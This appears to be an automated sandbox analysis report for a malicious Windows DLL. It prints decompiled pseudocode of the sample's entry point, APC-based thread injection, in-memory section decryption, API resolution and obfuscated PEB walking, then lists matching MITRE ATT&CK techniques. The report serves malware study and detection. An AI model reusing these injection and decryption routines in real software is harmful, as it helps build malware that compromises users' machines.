WaitForSingleObject.KERNEL32(00000000,000000FF,100016EC,?,00000000), ref: 1000188C
GetExitCodeThread.KERNEL32(00000000,?), ref: 100018A0
CloseHandle.KERNEL32(00000000), ref: 100018A7
GetLastError.KERNEL32(100016EC,?,00000000), ref: 100018AF
GetLastError.KERNEL32 ref: 100018C2

Memory Dump Source

Source File: 00000005.00000002.813229419.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.813219093.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.813258777.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
String ID:
API String ID: 2280543912-0
Opcode ID: 0aa58aa6d42cb4d22d23c436fe1160939981fc51a77b7536e6a86e18351e194f
Instruction ID: 7cd3c566562f9a2fb2f569ae31459f2ac3cb863b4347ce568516a042169d6725
Opcode Fuzzy Hash: 0aa58aa6d42cb4d22d23c436fe1160939981fc51a77b7536e6a86e18351e194f
Instruction Fuzzy Hash: 8831A1758057629BF311DF658C889DF77ECEF856D0B118A2AF954C2198EB30DA408BB2

Uniqueness

Uniqueness Score: -1.00%

Function 10001E04, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x10004188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x1000418c;
						if( *0x1000418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x10004198;
								if( *0x10004198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x1000418c);
						}
						HeapDestroy( *0x10004190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x10004188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x10004190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x100041b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E10001CA4(E10001D32, E10001EE0(_a12, 1, 0x10004198, _t41));
							 *0x1000418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

APIs

InterlockedIncrement.KERNEL32(10004188), ref: 10001E26
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 10001E3B

Part of subcall function 10001CA4: CreateThread.KERNELBASE ref: 10001CBB
Part of subcall function 10001CA4: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001CD0
Part of subcall function 10001CA4: GetLastError.KERNEL32(00000000), ref: 10001CDB
Part of subcall function 10001CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 10001CE5
Part of subcall function 10001CA4: CloseHandle.KERNEL32(00000000), ref: 10001CEC
Part of subcall function 10001CA4: SetLastError.KERNEL32(00000000), ref: 10001CF5

InterlockedDecrement.KERNEL32(10004188), ref: 10001E8E
SleepEx.KERNEL32(00000064,00000001), ref: 10001EA8
CloseHandle.KERNEL32 ref: 10001EC4
HeapDestroy.KERNEL32 ref: 10001ED0

Memory Dump Source

Source File: 00000005.00000002.813229419.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.813219093.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.813258777.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 19457271cb858ac661add039b55f590c8dab6e10940bb86993ce01263234bb52
Instruction ID: 22b08fd1564e3c44917bda70764785d62cea463007abdf7386b51d2c5f0b3438
Opcode Fuzzy Hash: 19457271cb858ac661add039b55f590c8dab6e10940bb86993ce01263234bb52
Instruction Fuzzy Hash: 8C2160B1A01255EBF701DFA9DCC4ADE7BECFB592E07524129FA05D3158EB309D408B64

Uniqueness

Uniqueness Score: -1.00%

Function 10001CA4, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001CA4(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x100041cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x10001cbb
0x10001cc1
0x10001cc5
0x10001cd0
0x10001cd8
0x10001ce1
0x10001ce5
0x10001cec
0x10001cf3
0x10001cf5
0x10001cfb
0x10001cd8
0x10001cff

APIs

CreateThread.KERNELBASE ref: 10001CBB
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001CD0
GetLastError.KERNEL32(00000000), ref: 10001CDB
TerminateThread.KERNEL32(00000000,00000000), ref: 10001CE5
CloseHandle.KERNEL32(00000000), ref: 10001CEC
SetLastError.KERNEL32(00000000), ref: 10001CF5

Memory Dump Source

Source File: 00000005.00000002.813229419.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.813219093.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.813258777.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 6d1cd5c6a974930989a8ae65fc166bbbd3ee74a09a644123e2c542902ed632c2
Instruction ID: aecf462274e4e2916ae65de04f71fabe7fe1494f4b7b1e115c31076b21763587
Opcode Fuzzy Hash: 6d1cd5c6a974930989a8ae65fc166bbbd3ee74a09a644123e2c542902ed632c2
Instruction Fuzzy Hash: 11F01C36646631BBF3135BA08C9CF9BBFADFB097D1F018415FA0991169CB2188129BA5

Uniqueness

Uniqueness Score: -1.00%

Function 100015A3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E100015A3(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x100041b0;
				_t39 = E10001A4B(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x100041cc;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x10005137; // 0x10005137
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E10001D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x100041cc = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

APIs

VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 100015F9
memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,100017EC), ref: 1000168B
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 100016A6

Strings

Mar 26 2021, xrefs: 1000162B

Memory Dump Source

Source File: 00000005.00000002.813229419.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.813219093.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.813258777.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Mar 26 2021
API String ID: 4010158826-2175073649
Opcode ID: 62dad8ecebd3a3dc15aa44a41b425b4d7952eb9142e1894383754f03bc2d99a6
Instruction ID: 1e0bd1500fc3cf5386c94b321837961e85a44a819982b39ab5743068bfa5e9ee
Opcode Fuzzy Hash: 62dad8ecebd3a3dc15aa44a41b425b4d7952eb9142e1894383754f03bc2d99a6
Instruction Fuzzy Hash: D3316171E0061AAFEB01CF99CCC1BDEB7B9FF48384F148169E904A7249D771AA458F90

Uniqueness

Uniqueness Score: -1.00%

Function 10001D32, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10001D32(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E100017A7(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x10001d3b
0x10001d40
0x10001d4e
0x10001d53
0x10001d53
0x10001d59
0x10001d5e
0x10001d62
0x10001d66
0x10001d66
0x10001d70
0x10001d79

APIs

GetCurrentThread.KERNEL32 ref: 10001D35
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 10001D40
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 10001D53
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 10001D66

Memory Dump Source

Source File: 00000005.00000002.813229419.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.813219093.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.813258777.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: fdc63879a4410af3631367093bb185aa8dd17d01f64c48f993c14ac2051b8c2f
Instruction ID: 99b5a2023749ed6b023f9c2d187380a2768fa5325b5415318cb191f808259522
Opcode Fuzzy Hash: fdc63879a4410af3631367093bb185aa8dd17d01f64c48f993c14ac2051b8c2f
Instruction Fuzzy Hash: B5E092313067612BF3026B294CD8EAF7B9CDF922B17024326F524D21E8DB548C0589A5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04AF2D03, Relevance: .1, Instructions: 111
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E04AF2D03(signed int __eax, void* __ebx, signed int __ecx, signed int __edx, signed int __edi) {
				signed int _v8;
				signed int _v12;
				void* _t46;
				signed int _t47;
				void* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				void* _t54;
				signed int _t60;
				signed int _t66;
				signed int _t69;
				signed int _t78;
				signed int _t80;
				signed int _t82;
				signed int _t86;
				signed int _t91;
				signed int _t94;
				signed int _t105;
				signed int* _t109;

				_t54 = __ebx;
				_push(_v12);
				 *_t109 = __eax;
				_v8 = _v8 & 0x00000000;
				_push(_v8);
				 *_t109 =  *_t109 ^ __ecx;
				_v8 = 0;
				_push(_v8);
				 *_t109 =  *_t109 | __edx;
				_push(_t91);
				 *_t109 =  *_t109 - _t91;
				 *_t109 =  *_t109 + __edi;
				_v12 = 0;
				_push(_v12);
				 *_t109 =  *_t109 ^ _t91;
				if( *((intOrPtr*)(__ebx + 0x41c296)) != 1) {
					_push(_t105);
					_t76 = __edi & 0x00000000 ^ _t105 & 0x00000000 ^  *(__ebx + 0x41ce30);
					_t94 = _t91;
					_t78 =  *((intOrPtr*)((__eax & 0x00000000 | _t91 & 0x00000000 ^  *((__edi & 0x00000000 ^ _t105 & 0x00000000 ^  *(__ebx + 0x41ce30)) + 0x3c)) + _t76 + 0x28)) +  *(__ebx + 0x41c507);
					 *_t15 = _t78;
					_push(_v12);
					_pop(_t66);
					_v8 = __ecx;
					_t80 = _t78 & 0x00000000 | __ecx ^ _v8 ^  *(__ebx + 0x41c507);
					_push( *((intOrPtr*)(_t80 + 0x3c)));
					_pop( *_t22);
					_push(_v8);
					_pop(_t46);
					_t82 =  *((intOrPtr*)(_t46 + _t80 + 0x28)) +  *(__ebx + 0x41c507);
					_v12 = _t94;
					_t47 = _t82;
					_v8 = _t66;
					_t69 = _v8;
					_v8 = _t82;
					_t60 = _v8 & 0x00000000 | _t82 & 0x00000000 |  *( *((intOrPtr*)((_v12 & 0x00000000 ^ _t66 & 0x00000000 ^  *[fs:0x30]) + 0xc)) + 0xc);
					__eflags = _t60;
					while(1) {
						_v12 = _t47;
						_t86 = 0 ^  *(_t60 + 0x1c);
						_t47 = _v12;
						__eflags = _t47 - _t86;
						if(_t47 == _t86) {
							break;
						}
						__eflags = _t69 - _t86;
						if(__eflags != 0) {
							_t60 =  *(_t60 + 4);
							if(__eflags != 0) {
								continue;
							} else {
								 *((intOrPtr*)(_t54 + 0x41c296)) = 1;
								_pop(_t50);
								return _t50;
							}
						} else {
							_pop(_t51);
							return _t51;
						}
						goto L9;
					}
					 *_t38 = _t69;
					_push(_v12);
					_pop( *_t40);
					_pop(_t52);
					return _t52;
				} else {
					_pop(_t53);
					return _t53;
				}
				L9:
			}

0x04af2d03
0x04af2d09
0x04af2d0c
0x04af2d0f
0x04af2d13
0x04af2d16
0x04af2d19
0x04af2d20
0x04af2d23
0x04af2d26
0x04af2d27
0x04af2d2a
0x04af2d2d
0x04af2d34
0x04af2d37
0x04af2d41
0x04af2d4c
0x04af2d59
0x04af2d68
0x04af2d6d
0x04af2d74
0x04af2d77
0x04af2d7a
0x04af2d7b
0x04af2d8a
0x04af2d8f
0x04af2d92
0x04af2d95
0x04af2d98
0x04af2d9d
0x04af2da3
0x04af2daa
0x04af2daf
0x04af2dc1
0x04af2dc7
0x04af2dd3
0x04af2dd3
0x04af2dd8
0x04af2dd8
0x04af2de0
0x04af2de2
0x04af2de5
0x04af2de7
0x00000000
0x00000000
0x04af2dfc
0x04af2dfe
0x04af2e09
0x04af2e0c
0x00000000
0x04af2e0e
0x04af2e0e
0x04af2e1c
0x04af2e1e
0x04af2e1e
0x04af2e00
0x04af2e04
0x04af2e06
0x04af2e06
0x00000000
0x04af2dfe
0x04af2dea
0x04af2ded
0x04af2df0
0x04af2df7
0x04af2df9
0x04af2d43
0x04af2d47
0x04af2d49
0x04af2d49
0x00000000

Memory Dump Source

Source File: 00000005.00000002.812972364.0000000004AF0000.00000040.00000001.sdmp, Offset: 04AF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38c8ddb8d4f8755332d9c8d25756577ca964309a6c18923092f54fa461d00f84
Instruction ID: ea1b6e143f377f8da995201ff8dd74698747a0cc83c866ef3720b888e6c7c83d
Opcode Fuzzy Hash: 38c8ddb8d4f8755332d9c8d25756577ca964309a6c18923092f54fa461d00f84
Instruction Fuzzy Hash: E441AD37A04514EFDB01CF94E9817DDFBB2EF88324F3580AAD544A7140CB35AA51DB94

Uniqueness

Uniqueness Score: -1.00%

Function 10001979, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E10001979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L10002210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x100041d0;
				_push(_t15 + 0x1000505e);
				_push(_t15 + 0x10005054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L1000220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t34 = CreateFileMappingW(0xffffffff, 0x100041c0, 4, 0, _t18,  &_v60);
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x10001979
0x10001982
0x10001986
0x1000198c
0x10001991
0x10001996
0x10001999
0x1000199c
0x100019a1
0x100019a2
0x100019a5
0x100019b0
0x100019b7
0x100019bb
0x100019bd
0x100019be
0x100019c1
0x100019c6
0x100019d0
0x100019d2
0x100019d2
0x100019ec
0x100019f0
0x10001a40
0x100019f2
0x100019fb
0x10001a11
0x10001a19
0x10001a2b
0x10001a2f
0x00000000
0x00000000
0x10001a1b
0x10001a1e
0x10001a23
0x10001a25
0x10001a25
0x10001a06
0x10001a08
0x10001a31
0x10001a32
0x10001a32
0x100019fb
0x10001a48

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,1000176E,0000000A,?,?), ref: 10001986
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 1000199C
_snwprintf.NTDLL ref: 100019C1
CreateFileMappingW.KERNEL32(000000FF,100041C0,00000004,00000000,?,?), ref: 100019E6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,1000176E,0000000A,?), ref: 100019FD
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 10001A11
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,1000176E,0000000A,?), ref: 10001A29
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,1000176E,0000000A), ref: 10001A32
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,1000176E,0000000A,?), ref: 10001A3A

Memory Dump Source

Source File: 00000005.00000002.813229419.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.813219093.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.813258777.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 73fdbbed011ea5ad313a47bb3d0880da75e3679d1784bab261cc02851e7121c3
Instruction ID: 6370643cb4eae1a4f3621eee97f40527c8ec301770f17fee856c827e2c33f9c2
Opcode Fuzzy Hash: 73fdbbed011ea5ad313a47bb3d0880da75e3679d1784bab261cc02851e7121c3
Instruction Fuzzy Hash: D821B0B2601218BFE711DFA8DCC5EDF77ACEB493D4F118066FA11D7158D67099408B61

Uniqueness

Uniqueness Score: -1.00%

Function 10001AA5, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E10001C8F(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x100041d0 + 0x10005014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x100041d0 + 0x100050e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E1000136A(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x100041d0 + 0x100050f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x100041d0 + 0x10005104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x100041d0 + 0x10005119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x100041d0 + 0x1000512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E100018D1(_t56, _a12);
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

APIs

Part of subcall function 10001C8F: HeapAlloc.KERNEL32(00000000,?,1000117D,?,00000000,00000000,?,?,?,10001810), ref: 10001C9B

GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,10001272,?,?,?,?,00000002,00000000,?,?), ref: 10001AC9
GetProcAddress.KERNEL32(00000000,?), ref: 10001AEB
GetProcAddress.KERNEL32(00000000,?), ref: 10001B01
GetProcAddress.KERNEL32(00000000,?), ref: 10001B17
GetProcAddress.KERNEL32(00000000,?), ref: 10001B2D
GetProcAddress.KERNEL32(00000000,?), ref: 10001B43

Part of subcall function 100018D1: memset.NTDLL ref: 10001950

Memory Dump Source

Source File: 00000005.00000002.813229419.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.813219093.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.813258777.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocHandleHeapModulememset
String ID:
API String ID: 426539879-0
Opcode ID: af5956ae6be44314a5df01ddd2a8e1fe29d23dd5da3ef23eacc272961148a90f
Instruction ID: d63599c59f16d2ccc43b5ec6806980ba7913547d508375ee0a4e4cbc4ad42cbf
Opcode Fuzzy Hash: af5956ae6be44314a5df01ddd2a8e1fe29d23dd5da3ef23eacc272961148a90f
Instruction Fuzzy Hash: D8211DF190431A9FE750DF69CC80E9B77ECEB486C4B024566F905C7269EB31ED018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 1000146C, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000146C() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x100041b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x100041bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x100041ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x100041a8 = _t5;
					 *0x100041b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x100041a4 = _t6;
					if(_t6 == 0) {
						 *0x100041a4 =  *0x100041a4 | 0xffffffff;
					}
					return 0;
				}
			}

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,100017B8,74E063F0,00000000), ref: 1000147B
GetVersion.KERNEL32 ref: 1000148A
GetCurrentProcessId.KERNEL32 ref: 10001499
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 100014B2

Memory Dump Source

Source File: 00000005.00000002.813229419.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.813219093.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.813258777.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: c22d7a1e861d9b5ab8ddadfe1c88c2622c48aec889c6041dcac182c51d9fc0db
Instruction ID: efac22bf22a3afc3d9ace4fbd9713eefa687801ef705910cd313f3733c03d1a3
Opcode Fuzzy Hash: c22d7a1e861d9b5ab8ddadfe1c88c2622c48aec889c6041dcac182c51d9fc0db
Instruction Fuzzy Hash: 4DF09AB0646231AFF7419F68AC897C23BE8F708BD1F02801AF245C90FCDBB044808B89

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

